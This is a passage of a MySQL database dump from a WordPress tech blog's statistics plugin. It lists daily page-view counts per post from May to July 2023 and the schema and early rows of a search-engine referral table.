(4372,'/','home','2023-05-12',127,647),
(4373,'/impdp-errors-ora-02374-ora-12899/','post','2023-05-12',8,56),
(4374,'/','home','2023-05-13',62,647),
(4375,'/impdp-errors-ora-02374-ora-12899/','post','2023-05-13',7,56),
(4376,'/','home','2023-05-14',225,647),
(4377,'/impdp-errors-ora-02374-ora-12899/','post','2023-05-14',7,56),
(4378,'/','home','2023-05-15',265,647),
(4379,'/impdp-errors-ora-02374-ora-12899/','post','2023-05-15',7,56),
(4380,'/','home','2023-05-16',56,647),
(4381,'/?action=register','home','2023-05-16',1,647),
(4382,'/impdp-errors-ora-02374-ora-12899/','post','2023-05-16',7,56),
(4383,'/impdp-errors-ora-02374-ora-12899','post','2023-05-16',1,56),
(4384,'/','home','2023-05-17',136,647),
(4385,'/impdp-errors-ora-02374-ora-12899/','post','2023-05-17',7,56),
(4386,'/','home','2023-05-18',252,647),
(4387,'/impdp-errors-ora-02374-ora-12899/','post','2023-05-18',7,56),
(4388,'/setup-high-availability-for-haproxy/','post','2023-05-18',1,615),
(4389,'/','home','2023-05-19',140,647),
(4390,'/impdp-errors-ora-02374-ora-12899/','post','2023-05-19',6,56),
(4391,'/connection-encryption-in-oracle-database/','post','2023-05-19',1,110),
(4392,'/connection-encryption-in-oracle-database/feed/','feed','2023-05-19',1,110),
(4393,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-05-19',2,583),
(4394,'/about-me/','page','2023-05-19',1,51),
(4395,'/impdp-errors-ora-02374-ora-12899/','post','2023-05-20',7,56),
(4396,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-05-20',2,583),
(4397,'/about-me/','page','2023-05-20',1,51),
(4398,'/','home','2023-05-20',179,647),
(4399,'/change-the-character-set-collation-of-a-table/feed/','feed','2023-05-20',1,68),
(4400,'/index.php/about-me/','page','2023-05-20',1,51),
(4401,'/connection-encryption-in-oracle-database/feed/','feed','2023-05-20',1,110),
(4402,'/setup-high-availability-for-haproxy/feed/','feed','2023-05-20',1,615),
(4403,'/page/2/','home','2023-05-20',1,647),
(4404,'/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2023-05-20',1,27),
(4405,'/backup-restore-progress/feed/','feed','2023-05-20',1,64),
(4406,'/sudo-without-password/feed/','feed','2023-05-20',1,603),
(4407,'/database-startup-error-fatal-ni-connect-error-12547/','post','2023-05-20',1,60),
(4408,'/add-new-disk-to-redhat-based-linux-without-reboot/feed/','feed','2023-05-20',1,97),
(4409,'/database-startup-error-fatal-ni-connect-error-12547/feed/','feed','2023-05-20',1,60),
(4410,'/index.php/page/2/','home','2023-05-20',1,647),
(4411,'/impdp-errors-ora-02374-ora-12899/','post','2023-05-21',7,56),
(4412,'/','home','2023-05-21',174,647),
(4413,'/about-me/','page','2023-05-21',1,51),
(4414,'/','home','2023-05-22',299,647),
(4415,'/impdp-errors-ora-02374-ora-12899/','post','2023-05-22',7,56),
(4416,'/fedora-33-problem-with-broadcom-wifi-device','post','2023-05-22',1,312),
(4417,'/fedora-33-problem-with-broadcom-wifi-device/','post','2023-05-22',1,312),
(4418,'/sudo-without-password','post','2023-05-22',1,603),
(4419,'/setup-high-availability-for-haproxy','post','2023-05-22',1,615),
(4420,'/setup-high-availability-for-haproxy/','post','2023-05-22',1,615),
(4421,'/sudo-without-password/','post','2023-05-22',1,603),
(4422,'/hosting-a-podcast','post','2023-05-22',1,329),
(4423,'/hosting-a-podcast/','post','2023-05-22',1,329),
(4424,'/how-to-make-apache-web-server-more-secure','post','2023-05-22',1,305),
(4425,'/how-to-make-apache-web-server-more-secure/','post','2023-05-22',1,305),
(4426,'/about-me','page','2023-05-22',1,51),
(4427,'/about-me/','page','2023-05-22',1,51),
(4428,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password','post','2023-05-22',1,583),
(4429,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-05-22',1,583),
(4430,'/impdp-errors-ora-02374-ora-12899/','post','2023-05-23',8,56),
(4431,'/','home','2023-05-23',174,647),
(4432,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-05-23',1,583),
(4433,'/','home','2023-05-24',449,647),
(4434,'/impdp-errors-ora-02374-ora-12899/','post','2023-05-24',4,56),
(4435,'/about-me','page','2023-05-24',1,51),
(4436,'/about-me/','page','2023-05-24',1,51),
(4437,'/connection-encryption-in-oracle-database/','post','2023-05-24',1,110),
(4438,'/connection-encryption-in-oracle-database/feed/','feed','2023-05-24',1,110),
(4439,'/','home','2023-05-25',210,647),
(4440,'/impdp-errors-ora-02374-ora-12899/','post','2023-05-25',5,56),
(4441,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-05-25',1,583),
(4442,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/feed/','feed','2023-05-25',1,583),
(4443,'/','home','2023-05-26',71,647),
(4444,'/impdp-errors-ora-02374-ora-12899/','post','2023-05-26',3,56),
(4445,'/about-me/','page','2023-05-26',2,51),
(4446,'/sudo-without-password/','post','2023-05-26',1,603),
(4447,'/setup-high-availability-for-haproxy/','post','2023-05-26',1,615),
(4448,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-05-26',1,583),
(4449,'/','home','2023-05-27',318,647),
(4450,'/impdp-errors-ora-02374-ora-12899/','post','2023-05-27',4,56),
(4451,'/about-me/','page','2023-05-27',1,51),
(4452,'/?action=register','home','2023-05-27',1,647),
(4453,'/','home','2023-05-28',88,647),
(4454,'/impdp-errors-ora-02374-ora-12899/','post','2023-05-28',3,56),
(4455,'/connection-encryption-in-oracle-database/feed/','feed','2023-05-28',1,110),
(4456,'/page/2/','home','2023-05-28',1,647),
(4457,'/','home','2023-05-29',300,647),
(4458,'/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2023-05-29',1,27),
(4459,'/impdp-errors-ora-02374-ora-12899/','post','2023-05-29',5,56),
(4460,'/?action=register','home','2023-05-29',1,647),
(4461,'/','home','2023-05-30',246,647),
(4462,'/impdp-errors-ora-02374-ora-12899/','post','2023-05-30',3,56),
(4463,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2023-05-30',2,150),
(4464,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-05-30',2,583),
(4465,'/impdp-errors-ora-02374-ora-12899/','post','2023-05-31',5,56),
(4466,'/','home','2023-05-31',157,647),
(4467,'/change-the-character-set-collation-of-a-table/feed/','feed','2023-05-31',1,68),
(4468,'/index.php/about-me/','page','2023-05-31',1,51),
(4469,'/','home','2023-06-01',227,647),
(4470,'/impdp-errors-ora-02374-ora-12899/','post','2023-06-01',4,56),
(4471,'/','home','2023-06-02',375,647),
(4472,'/impdp-errors-ora-02374-ora-12899/','post','2023-06-02',4,56),
(4473,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-06-02',2,583),
(4474,'/fedora-33-problem-with-broadcom-wifi-device/','post','2023-06-02',1,312),
(4475,'/impdp-errors-ora-02374-ora-12899/','post','2023-06-03',4,56),
(4476,'/','home','2023-06-03',751,647),
(4477,'/about-me/','page','2023-06-03',1,51),
(4478,'/fedora-33-problem-with-broadcom-wifi-device/','post','2023-06-03',1,312),
(4479,'/','home','2023-06-04',927,647),
(4480,'/how-to-make-apache-web-server-more-secure/','post','2023-06-04',1,305),
(4481,'/impdp-errors-ora-02374-ora-12899/','post','2023-06-04',5,56),
(4482,'/','home','2023-06-05',111,647),
(4483,'/impdp-errors-ora-02374-ora-12899/','post','2023-06-05',3,56),
(4484,'/connection-encryption-in-oracle-database/','post','2023-06-05',1,110),
(4485,'/connection-encryption-in-oracle-database/feed/','feed','2023-06-05',1,110),
(4486,'/','home','2023-06-06',205,647),
(4487,'/impdp-errors-ora-02374-ora-12899/','post','2023-06-06',3,56),
(4488,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-06-06',3,583),
(4489,'/connection-encryption-in-oracle-database/','post','2023-06-06',1,110),
(4490,'/connection-encryption-in-oracle-database/feed/','feed','2023-06-06',1,110),
(4491,'/','home','2023-06-07',133,647),
(4492,'/impdp-errors-ora-02374-ora-12899/','post','2023-06-07',5,56),
(4493,'/connection-encryption-in-oracle-database/','post','2023-06-07',1,110),
(4494,'/connection-encryption-in-oracle-database/feed/','feed','2023-06-07',1,110),
(4495,'/','home','2023-06-08',307,647),
(4496,'/impdp-errors-ora-02374-ora-12899/','post','2023-06-08',4,56),
(4497,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-06-08',1,583),
(4498,'/connection-encryption-in-oracle-database/','post','2023-06-08',2,110),
(4499,'/connection-encryption-in-oracle-database/feed/','feed','2023-06-08',1,110),
(4500,'/','home','2023-06-09',32,647),
(4501,'/impdp-errors-ora-02374-ora-12899/','post','2023-06-09',4,56),
(4502,'/connection-encryption-in-oracle-database/','post','2023-06-09',1,110),
(4503,'/connection-encryption-in-oracle-database/feed/','feed','2023-06-09',1,110),
(4504,'/','home','2023-06-10',159,647),
(4505,'/impdp-errors-ora-02374-ora-12899/','post','2023-06-10',5,56),
(4506,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-06-10',2,583),
(4507,'/about-me/','page','2023-06-10',1,51),
(4508,'/','home','2023-06-11',164,647),
(4509,'/impdp-errors-ora-02374-ora-12899/','post','2023-06-11',5,56),
(4510,'/hosting-a-podcast','post','2023-06-11',1,329),
(4511,'/hosting-a-podcast/','post','2023-06-11',1,329),
(4512,'/sudo-without-password','post','2023-06-11',1,603),
(4513,'/sudo-without-password/','post','2023-06-11',2,603),
(4514,'/how-to-make-apache-web-server-more-secure','post','2023-06-11',1,305),
(4515,'/how-to-make-apache-web-server-more-secure/','post','2023-06-11',1,305),
(4516,'/setup-high-availability-for-haproxy','post','2023-06-11',1,615),
(4517,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password','post','2023-06-11',1,583),
(4518,'/fedora-33-problem-with-broadcom-wifi-device','post','2023-06-11',1,312),
(4519,'/setup-high-availability-for-haproxy/','post','2023-06-11',2,615),
(4520,'/fedora-33-problem-with-broadcom-wifi-device/','post','2023-06-11',1,312),
(4521,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-06-11',2,583),
(4522,'/','home','2023-06-12',431,647),
(4523,'/impdp-errors-ora-02374-ora-12899/','post','2023-06-12',4,56),
(4524,'/connection-encryption-in-oracle-database/','post','2023-06-12',1,110),
(4525,'/connection-encryption-in-oracle-database/feed/','feed','2023-06-12',1,110),
(4526,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-06-12',1,583),
(4527,'/','home','2023-06-13',127,647),
(4528,'/connection-encryption-in-oracle-database/','post','2023-06-13',1,110),
(4529,'/connection-encryption-in-oracle-database/feed/','feed','2023-06-13',1,110),
(4530,'/impdp-errors-ora-02374-ora-12899/','post','2023-06-13',4,56),
(4531,'//','home','2023-06-13',1,647),
(4532,'/sudo-without-password/','post','2023-06-13',1,603),
(4533,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-06-13',1,583),
(4534,'/hosting-a-podcast/','post','2023-06-13',1,329),
(4535,'/fedora-33-problem-with-broadcom-wifi-device/','post','2023-06-13',1,312),
(4536,'/how-to-make-apache-web-server-more-secure/','post','2023-06-13',1,305),
(4537,'/about-me/','page','2023-06-13',2,51),
(4538,'/','home','2023-06-14',60,647),
(4539,'/connection-encryption-in-oracle-database/','post','2023-06-14',1,110),
(4540,'/connection-encryption-in-oracle-database/feed/','feed','2023-06-14',1,110),
(4541,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-06-14',2,583),
(4542,'/impdp-errors-ora-02374-ora-12899/','post','2023-06-14',4,56),
(4543,'/about-me','page','2023-06-14',1,51),
(4544,'/about-me/','page','2023-06-14',1,51),
(4545,'/','home','2023-06-15',106,647),
(4546,'/impdp-errors-ora-02374-ora-12899/','post','2023-06-15',6,56),
(4547,'/?action=register','home','2023-06-15',1,647),
(4548,'/','home','2023-06-16',98,647),
(4549,'/impdp-errors-ora-02374-ora-12899/','post','2023-06-16',3,56),
(4550,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-06-16',2,583),
(4551,'/connection-encryption-in-oracle-database/','post','2023-06-16',3,110),
(4552,'/connection-encryption-in-oracle-database/feed/','feed','2023-06-16',2,110),
(4553,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/feed/','feed','2023-06-16',1,583),
(4554,'/','home','2023-06-17',42,647),
(4555,'/about-me/','page','2023-06-17',1,51),
(4556,'/setup-high-availability-for-haproxy/','post','2023-06-17',1,615),
(4557,'/sudo-without-password/','post','2023-06-17',1,603),
(4558,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-06-17',1,583),
(4559,'/hosting-a-podcast/','post','2023-06-17',1,329),
(4560,'/fedora-33-problem-with-broadcom-wifi-device/','post','2023-06-17',1,312),
(4561,'/how-to-make-apache-web-server-more-secure/','post','2023-06-17',1,305),
(4562,'/connection-encryption-in-oracle-database/','post','2023-06-17',1,110),
(4563,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2023-06-17',1,97),
(4564,'/change-the-character-set-collation-of-a-table/','post','2023-06-17',1,68),
(4565,'/rebuild-and-reorganize-all-indexes-within-a-database/','post','2023-06-17',1,66),
(4566,'/backup-restore-progress/','post','2023-06-17',1,64),
(4567,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2023-06-17',1,104),
(4568,'/impdp-errors-ora-02374-ora-12899/','post','2023-06-17',4,56),
(4569,'/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2023-06-17',1,27),
(4570,'/impdp-errors-ora-02374-ora-12899','post','2023-06-17',1,56),
(4571,'/','home','2023-06-18',384,647),
(4572,'/impdp-errors-ora-02374-ora-12899/','post','2023-06-18',2,56),
(4573,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-06-18',1,583),
(4574,'/connection-encryption-in-oracle-database/','post','2023-06-18',1,110),
(4575,'/connection-encryption-in-oracle-database/feed/','feed','2023-06-18',1,110),
(4576,'/','home','2023-06-19',348,647),
(4577,'/about-me/','page','2023-06-19',1,51),
(4578,'/impdp-errors-ora-02374-ora-12899/','post','2023-06-19',4,56),
(4579,'/connection-encryption-in-oracle-database/','post','2023-06-19',3,110),
(4580,'/connection-encryption-in-oracle-database/feed/','feed','2023-06-19',3,110),
(4581,'/','home','2023-06-20',230,647),
(4582,'/about-me/','page','2023-06-20',1,51),
(4583,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-06-20',1,583),
(4584,'/impdp-errors-ora-02374-ora-12899/','post','2023-06-20',4,56),
(4585,'/connection-encryption-in-oracle-database/','post','2023-06-20',2,110),
(4586,'/connection-encryption-in-oracle-database/feed/','feed','2023-06-20',2,110),
(4587,'/','home','2023-06-21',131,647),
(4588,'/impdp-errors-ora-02374-ora-12899/','post','2023-06-21',4,56),
(4589,'/about-me/','page','2023-06-21',1,51),
(4590,'/','home','2023-06-22',331,647),
(4591,'/impdp-errors-ora-02374-ora-12899/','post','2023-06-22',3,56),
(4592,'/about-me/','page','2023-06-22',1,51),
(4593,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-06-22',1,583),
(4594,'/fedora-33-problem-with-broadcom-wifi-device/','post','2023-06-22',1,312),
(4595,'/','home','2023-06-23',249,647),
(4596,'/impdp-errors-ora-02374-ora-12899/','post','2023-06-23',5,56),
(4597,'/about-me/','page','2023-06-23',2,51),
(4598,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-06-23',1,583),
(4599,'/','home','2023-06-24',201,647),
(4600,'/impdp-errors-ora-02374-ora-12899/','post','2023-06-24',2,56),
(4601,'/about-me/','page','2023-06-24',2,51),
(4602,'/setup-high-availability-for-haproxy/','post','2023-06-24',2,615),
(4603,'/sudo-without-password/','post','2023-06-24',2,603),
(4604,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-06-24',1,583),
(4605,'/hosting-a-podcast/','post','2023-06-24',1,329),
(4606,'/fedora-33-problem-with-broadcom-wifi-device/','post','2023-06-24',1,312),
(4607,'/how-to-make-apache-web-server-more-secure/','post','2023-06-24',2,305),
(4608,'/connection-encryption-in-oracle-database/','post','2023-06-24',2,110),
(4609,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2023-06-24',1,150),
(4610,'/connection-encryption-in-oracle-database/feed/','feed','2023-06-24',1,110),
(4611,'/','home','2023-06-25',379,647),
(4612,'/impdp-errors-ora-02374-ora-12899/','post','2023-06-25',3,56),
(4613,'/fedora-33-problem-with-broadcom-wifi-device/feed/','feed','2023-06-25',1,312),
(4614,'/setup-high-availability-for-haproxy/','post','2023-06-25',1,615),
(4615,'/sudo-without-password/','post','2023-06-25',1,603),
(4616,'/','home','2023-06-26',409,647),
(4617,'/impdp-errors-ora-02374-ora-12899/','post','2023-06-26',5,56),
(4618,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2023-06-26',1,150),
(4619,'/change-the-character-set-collation-of-a-table/feed/','feed','2023-06-26',1,68),
(4620,'/setup-high-availability-for-haproxy/','post','2023-06-26',1,615),
(4621,'/connection-encryption-in-oracle-database/','post','2023-06-26',2,110),
(4622,'/connection-encryption-in-oracle-database/feed/','feed','2023-06-26',2,110),
(4623,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-06-26',1,583),
(4624,'/index.php/about-me/','page','2023-06-26',1,51),
(4625,'/','home','2023-06-27',107,647),
(4626,'/index.php/about-me/','page','2023-06-27',2,51),
(4627,'/impdp-errors-ora-02374-ora-12899/','post','2023-06-27',5,56),
(4628,'/about-me/','page','2023-06-27',2,51),
(4629,'/','home','2023-06-28',47,647),
(4630,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-06-28',4,583),
(4631,'/impdp-errors-ora-02374-ora-12899/','post','2023-06-28',5,56),
(4632,'/about-me/','page','2023-06-28',3,51),
(4633,'/index.php/about-me/','page','2023-06-28',1,51),
(4634,'/fedora-33-problem-with-broadcom-wifi-device/feed/','feed','2023-06-28',1,312),
(4635,'/','home','2023-06-29',86,647),
(4636,'/impdp-errors-ora-02374-ora-12899/','post','2023-06-29',5,56),
(4637,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-06-29',1,583),
(4638,'/','home','2023-06-30',87,647),
(4639,'/impdp-errors-ora-02374-ora-12899/','post','2023-06-30',5,56),
(4640,'/sudo-without-password/','post','2023-06-30',1,603),
(4641,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-06-30',1,583),
(4642,'/hosting-a-podcast/','post','2023-06-30',1,329),
(4643,'/fedora-33-problem-with-broadcom-wifi-device/','post','2023-06-30',1,312),
(4644,'/how-to-make-apache-web-server-more-secure/','post','2023-06-30',1,305),
(4645,'/about-me/','page','2023-06-30',2,51),
(4646,'/connection-encryption-in-oracle-database/','post','2023-06-30',1,110),
(4647,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2023-06-30',1,97),
(4648,'/change-the-character-set-collation-of-a-table/','post','2023-06-30',1,68),
(4649,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2023-06-30',1,104),
(4650,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2023-06-30',1,150),
(4651,'/setup-high-availability-for-haproxy/','post','2023-06-30',2,615),
(4652,'/setup-high-availability-for-haproxy/feed/','feed','2023-06-30',1,615),
(4653,'/?p=615','post','2023-06-30',1,615),
(4654,'/','home','2023-07-01',114,647),
(4655,'/impdp-errors-ora-02374-ora-12899/','post','2023-07-01',3,56),
(4656,'/change-font-in-moodle/','post','2023-07-01',1,752),
(4657,'/','home','2023-07-02',244,647),
(4658,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-07-02',1,583),
(4659,'/impdp-errors-ora-02374-ora-12899/','post','2023-07-02',4,56),
(4660,'/fedora-33-problem-with-broadcom-wifi-device/','post','2023-07-02',1,312),
(4661,'/','home','2023-07-03',257,647),
(4662,'/impdp-errors-ora-02374-ora-12899/','post','2023-07-03',3,56),
(4663,'/hosting-a-podcast','post','2023-07-03',1,329),
(4664,'/hosting-a-podcast/','post','2023-07-03',1,329),
(4665,'/setup-high-availability-for-haproxy','post','2023-07-03',1,615),
(4666,'/setup-high-availability-for-haproxy/','post','2023-07-03',1,615),
(4667,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password','post','2023-07-03',1,583),
(4668,'/change-font-in-moodle','post','2023-07-03',1,752),
(4669,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-07-03',1,583),
(4670,'/sudo-without-password','post','2023-07-03',1,603),
(4671,'/change-font-in-moodle/','post','2023-07-03',1,752),
(4672,'/fedora-33-problem-with-broadcom-wifi-device','post','2023-07-03',1,312),
(4673,'/sudo-without-password/','post','2023-07-03',1,603),
(4674,'/fedora-33-problem-with-broadcom-wifi-device/','post','2023-07-03',1,312),
(4675,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2023-07-03',1,150),
(4676,'/change-the-character-set-collation-of-a-table/feed/','feed','2023-07-03',1,68),
(4677,'/','home','2023-07-04',254,647),
(4678,'/impdp-errors-ora-02374-ora-12899/','post','2023-07-04',6,56),
(4679,'/connection-encryption-in-oracle-database/feed/','feed','2023-07-04',1,110),
(4680,'/about-me/','page','2023-07-04',1,51),
(4681,'/backup-restore-progress/feed/','feed','2023-07-04',1,64),
(4682,'/change-the-character-set-collation-of-a-table/','post','2023-07-04',1,68),
(4683,'/index.php/about-me/','page','2023-07-04',1,51),
(4684,'/how-to-make-apache-web-server-more-secure/','post','2023-07-04',1,305),
(4685,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-07-04',1,583),
(4686,'/','home','2023-07-05',109,647),
(4687,'/impdp-errors-ora-02374-ora-12899/','post','2023-07-05',3,56),
(4688,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-07-05',1,583),
(4689,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2023-07-05',1,97),
(4690,'/how-to-make-apache-web-server-more-secure/feed/','feed','2023-07-05',1,305),
(4691,'/backup-restore-progress/','post','2023-07-06',1,64),
(4692,'/hosting-a-podcast/feed/','feed','2023-07-06',1,329),
(4693,'/connection-encryption-in-oracle-database/','post','2023-07-06',2,110),
(4694,'/rebuild-and-reorganize-all-indexes-within-a-database/','post','2023-07-06',1,66),
(4695,'/','home','2023-07-06',245,647),
(4696,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-07-06',1,583),
(4697,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2023-07-06',1,104),
(4698,'/rebuild-and-reorganize-all-indexes-within-a-database/feed/','feed','2023-07-06',1,66),
(4699,'/impdp-errors-ora-02374-ora-12899/','post','2023-07-06',3,56),
(4700,'/connection-encryption-in-oracle-database/feed/','feed','2023-07-06',1,110),
(4701,'/?action=register','home','2023-07-06',1,647),
(4702,'/','home','2023-07-07',65,647),
(4703,'/impdp-errors-ora-02374-ora-12899/','post','2023-07-07',4,56),
(4704,'/','home','2023-07-08',52,647),
(4705,'/impdp-errors-ora-02374-ora-12899/','post','2023-07-08',4,56),
(4706,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-07-08',2,583),
(4707,'/','home','2023-07-09',26,647),
(4708,'/impdp-errors-ora-02374-ora-12899/','post','2023-07-09',3,56),
(4709,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2023-07-09',1,150),
(4710,'/about-me/','page','2023-07-09',1,51),
(4711,'/sudo-without-password/','post','2023-07-09',1,603),
(4712,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2023-07-09',1,583),
(4713,'/hosting-a-podcast/','post','2023-07-09',1,329),
(4714,'/fedora-33-problem-with-broadcom-wifi-device/','post','2023-07-09',1,312),
(4715,'/','home','2023-07-10',32,647),
(4716,'/impdp-errors-ora-02374-ora-12899/','post','2023-07-10',4,56),
(4717,'/about-me/','page','2023-07-10',1,51),
(4718,'/','home','2023-07-11',311,647),
(4719,'/','home','2023-07-12',172,647);
/*!40000 ALTER TABLE `wp_statistics_pages` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_statistics_search`
--
DROP TABLE IF EXISTS `wp_statistics_search`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_statistics_search` (
`ID` bigint(20) NOT NULL AUTO_INCREMENT,
`last_counter` date NOT NULL,
`engine` varchar(64) CHARACTER SET utf8mb3 COLLATE utf8mb3_general_ci NOT NULL,
`host` varchar(255) CHARACTER SET utf8mb3 COLLATE utf8mb3_general_ci DEFAULT NULL,
`words` varchar(255) CHARACTER SET utf8mb3 COLLATE utf8mb3_general_ci DEFAULT NULL,
`visitor` bigint(20) DEFAULT NULL,
PRIMARY KEY (`ID`),
KEY `last_counter` (`last_counter`),
KEY `engine` (`engine`),
KEY `host` (`host`)
) ENGINE=InnoDB AUTO_INCREMENT=1894 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci ROW_FORMAT=COMPACT;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_statistics_search`
--
LOCK TABLES `wp_statistics_search` WRITE;
/*!40000 ALTER TABLE `wp_statistics_search` DISABLE KEYS */;
INSERT INTO `wp_statistics_search` VALUES
(1,'2020-02-16','google','google.com','',141),
(2,'2020-03-06','google','www.google.com','',335),
(3,'2020-03-06','google','www.google.com','',337),
(4,'2020-03-18','google','www.google.com','',675),
(5,'2020-03-18','google','google.com','',686),
(6,'2020-03-20','google','www.google.com','',875),
(7,'2020-03-20','bing','www.bing.com','amazon',896),
(8,'2020-03-20','bing','www.bing.com','amazon',897),
(9,'2020-03-20','google','google.com','',985),
(10,'2020-03-21','bing','www.bing.com','amazon',1102),
(11,'2020-03-21','google','www.google.com','',1114),
(12,'2020-03-21','google','www.google.com','',1115),
(13,'2020-03-21','google','www.google.com','',1116),
(14,'2020-03-21','google','www.google.com','',1117),
(15,'2020-03-21','google','www.google.com','',1118),
(16,'2020-03-21','bing','www.bing.com','',1142),
(17,'2020-03-21','bing','www.bing.com','',1143),
(18,'2020-03-22','bing','www.bing.com','amazon',1306),
(19,'2020-03-22','google','www.google.com','',1308),
(20,'2020-03-22','google','www.google.com','',1307),
(21,'2020-03-22','google','www.google.com','',1310),
(22,'2020-03-22','google','www.google.com','',1311),
(23,'2020-03-22','bing','www.bing.com','amazon',1331),
(24,'2020-03-23','bing','www.bing.com','amazon',1366),
(25,'2020-03-23','google','www.google.com','',1368),
(26,'2020-03-23','google','www.google.com','',1369),
(27,'2020-03-23','google','www.google.com','',1370),
(28,'2020-03-23','google','www.google.com','',1371),
(29,'2020-03-23','google','www.google.com','',1379),
(30,'2020-03-23','google','www.google.com','',1380),
(31,'2020-03-23','google','www.google.com','',1381),
(32,'2020-03-23','google','www.google.com','',1382),
(33,'2020-03-23','bing','www.bing.com','amazon',1396),
(34,'2020-03-24','google','www.google.com','',1403),
(35,'2020-03-24','google','www.google.com','',1404),
(36,'2020-03-24','google','www.google.com','',1405),
(37,'2020-03-24','google','www.google.com','',1406),
(38,'2020-03-24','bing','www.bing.com','amazon',1415),
(39,'2020-03-24','google','www.google.com','',1420),
(40,'2020-03-24','google','www.google.com','',1421),
(41,'2020-03-24','google','www.google.com','',1422),
(42,'2020-03-24','google','www.google.com','',1423),
(43,'2020-03-25','bing','www.bing.com','amazon',1435),
(44,'2020-03-25','bing','www.bing.com','amazon',1447),
(45,'2020-03-26','bing','www.bing.com','amazon',1465),
(46,'2020-03-26','bing','www.bing.com','amazon',1464),
(47,'2020-03-26','google','www.google.com','',1466),
(48,'2020-03-26','bing','www.bing.com','amazon',1504),
(49,'2020-03-27','google','www.google.com','',1519),
(50,'2020-03-27','bing','www.bing.com','amazon',1527),
(51,'2020-03-28','bing','www.bing.com','amazon',1551),
(52,'2020-03-29','bing','www.bing.com','amazon',1582),
(53,'2020-03-30','bing','www.bing.com','amazon',1595),
(54,'2020-03-31','bing','www.bing.com','amazon',1610),
(55,'2020-04-01','bing','www.bing.com','amazon',1630),
(56,'2020-04-04','bing','www.bing.com','amazon',1691),
(57,'2020-04-05','bing','www.bing.com','amazon',1703),
(58,'2020-04-06','google','www.google.com','',1718),
(59,'2020-04-07','google','www.google.com','',1733),
(60,'2020-04-08','google','google.com','',1752),
(61,'2020-04-08','google','www.google.com','',1758),
(62,'2020-04-09','google','google.com','',1809),
